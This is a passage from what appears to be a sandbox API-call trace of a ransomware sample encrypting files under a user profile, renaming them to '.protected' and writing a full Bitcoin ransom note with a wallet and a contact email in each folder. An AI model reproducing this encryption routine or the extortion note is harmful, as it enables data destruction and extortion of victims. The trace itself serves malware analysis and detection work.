HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc.protected")) returned 1 [0077.943] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: 
lpFindFileData=0x295e7d0) returned 1 [0077.943] lstrcmpiW (lpString1="wsRGB.icc", lpString2="Windows") returned 1 [0077.943] lstrcmpiW (lpString1="wsRGB.icc", lpString2="Program Files") returned 1 [0077.943] lstrcmpiW (lpString1="wsRGB.icc", lpString2="Program Files (x86)") returned 1 [0077.943] lstrcmpiW (lpString1="wsRGB.icc", lpString2="$Recycle.bin") returned 1 [0077.943] lstrcmpiW (lpString1="wsRGB.icc", lpString2="System Volume Information") returned 1 [0077.943] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc") returned 78 [0077.943] StrStrIW (lpFirst="wsRGB.icc", lpSrch=".protected") returned 0x0 [0077.943] lstrcmpW (lpString1="wsRGB.icc", lpString2="RESTORE_FILES.txt") returned 1 [0077.943] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0077.943] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0077.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0077.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc") returned 78 [0077.944] StrStrW (lpFirst="wsRGB.icc", lpSrch=".txt") returned 0x0 [0077.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc") returned 78 [0077.944] StrStrW (lpFirst="wsRGB.icc", lpSrch=".rar") returned 0x0 [0077.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc") returned 78 [0077.944] StrStrW (lpFirst="wsRGB.icc", lpSrch=".zip") returned 0x0 [0077.946] ReadFile (in: hFile=0x150, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e7b4*=0xa74, lpOverlapped=0x0) returned 1 [0078.015] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff58c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.015] WriteFile (in: hFile=0x150, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0xa74, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e7b4*=0xa74, lpOverlapped=0x0) returned 1 [0078.016] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.016] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0078.016] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0078.016] CloseHandle (hObject=0x150) returned 1 [0078.016] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc.protected") returned 88 [0078.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc.protected" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc.protected")) returned 1 [0078.017] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0078.017] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0078.017] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\RESTORE_FILES.txt") returned 86 [0078.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0078.041] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.041] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0078.042] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.042] WriteFile (in: hFile=0x14c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.042] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.042] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0078.042] CloseHandle (hObject=0x14c) returned 1 [0078.042] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0078.042] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0078.042] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\RESTORE_FILES.txt") returned 77 [0078.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0078.043] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.043] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0078.043] lstrlenA (lpString="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") returned 684 [0078.043] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0078.043] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.044] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.044] CloseHandle (hObject=0xd8) returned 1 [0078.045] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0078.045] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0078.045] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\RESTORE_FILES.txt") returned 71 [0078.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0078.046] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.046] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0078.046] lstrlenA (lpString="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") returned 684 [0078.046] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0078.046] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.046] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.046] CloseHandle (hObject=0xd4) returned 1 [0078.047] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0078.047] lstrcmpiW (lpString1="Application Data", lpString2="Windows") returned -1 [0078.047] lstrcmpiW (lpString1="Application Data", lpString2="Program Files") returned -1 [0078.047] lstrcmpiW (lpString1="Application Data", lpString2="Program Files (x86)") returned -1 [0078.047] lstrcmpiW (lpString1="Application Data", lpString2="$Recycle.bin") returned 1 [0078.047] lstrcmpiW (lpString1="Application Data", lpString2="System Volume Information") returned -1 [0078.047] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data") returned 64 [0078.047] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0078.047] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0078.047] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\*") returned 66 [0078.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0xffffffff [0078.047] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0078.047] lstrcmpiW (lpString1="Apps", lpString2="Windows") returned -1 [0078.047] lstrcmpiW (lpString1="Apps", lpString2="Program Files") returned -1 [0078.047] lstrcmpiW (lpString1="Apps", lpString2="Program Files (x86)") returned -1 [0078.047] lstrcmpiW (lpString1="Apps", lpString2="$Recycle.bin") returned 1 [0078.047] lstrcmpiW (lpString1="Apps", lpString2="System Volume Information") returned -1 [0078.047] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps") returned 52 [0078.047] lstrcmpW (lpString1="Apps", lpString2=".") returned 1 [0078.047] lstrcmpW (lpString1="Apps", lpString2="..") returned 1 [0078.047] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*") returned 54 [0078.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0078.048] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.048] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.048] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.048] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.048] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.048] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\.") returned 54 [0078.048] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.048] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0078.048] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.048] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.048] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.048] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.048] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.048] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\..") returned 55 [0078.048] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.048] lstrcmpW (lpString1="..", lpString2="..") 
returned 0 [0078.048] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0078.048] lstrcmpiW (lpString1="2.0", lpString2="Windows") returned -1 [0078.048] lstrcmpiW (lpString1="2.0", lpString2="Program Files") returned -1 [0078.048] lstrcmpiW (lpString1="2.0", lpString2="Program Files (x86)") returned -1 [0078.048] lstrcmpiW (lpString1="2.0", lpString2="$Recycle.bin") returned 1 [0078.048] lstrcmpiW (lpString1="2.0", lpString2="System Volume Information") returned -1 [0078.048] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0") returned 56 [0078.048] lstrcmpW (lpString1="2.0", lpString2=".") returned 1 [0078.048] lstrcmpW (lpString1="2.0", lpString2="..") returned 1 [0078.049] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*") returned 58 [0078.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0078.049] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.049] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.049] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.049] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.049] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.049] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\.") returned 58 [0078.049] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.049] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0078.049] lstrcmpiW (lpString1="..", lpString2="Windows") 
returned -1 [0078.049] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.049] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.049] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.049] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.049] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\..") returned 59 [0078.049] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.049] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.049] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0078.049] lstrcmpiW (lpString1="Data", lpString2="Windows") returned -1 [0078.049] lstrcmpiW (lpString1="Data", lpString2="Program Files") returned -1 [0078.049] lstrcmpiW (lpString1="Data", lpString2="Program Files (x86)") returned -1 [0078.049] lstrcmpiW (lpString1="Data", lpString2="$Recycle.bin") returned 1 [0078.049] lstrcmpiW (lpString1="Data", lpString2="System Volume Information") returned -1 [0078.049] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data") returned 61 [0078.049] lstrcmpW (lpString1="Data", lpString2=".") returned 1 [0078.049] lstrcmpW (lpString1="Data", lpString2="..") returned 1 [0078.050] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*") returned 63 [0078.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0078.051] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.051] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 
[0078.051] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.051] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.051] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.051] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\.") returned 63 [0078.051] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.051] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0078.051] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.051] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.051] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.051] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.051] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.051] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\..") returned 64 [0078.051] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.051] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.051] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0078.051] lstrcmpiW (lpString1="CJW3O3KP.BX7", lpString2="Windows") returned -1 [0078.051] lstrcmpiW (lpString1="CJW3O3KP.BX7", lpString2="Program Files") returned -1 [0078.051] lstrcmpiW (lpString1="CJW3O3KP.BX7", lpString2="Program Files (x86)") returned -1 [0078.051] lstrcmpiW (lpString1="CJW3O3KP.BX7", lpString2="$Recycle.bin") returned 1 [0078.051] lstrcmpiW (lpString1="CJW3O3KP.BX7", lpString2="System Volume Information") returned -1 [0078.051] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7") returned 74 [0078.051] lstrcmpW (lpString1="CJW3O3KP.BX7", lpString2=".") returned 1 [0078.051] lstrcmpW (lpString1="CJW3O3KP.BX7", lpString2="..") returned 1 [0078.051] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*") returned 76 [0078.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0078.051] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.051] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.052] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.052] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.052] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.052] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\.") returned 76 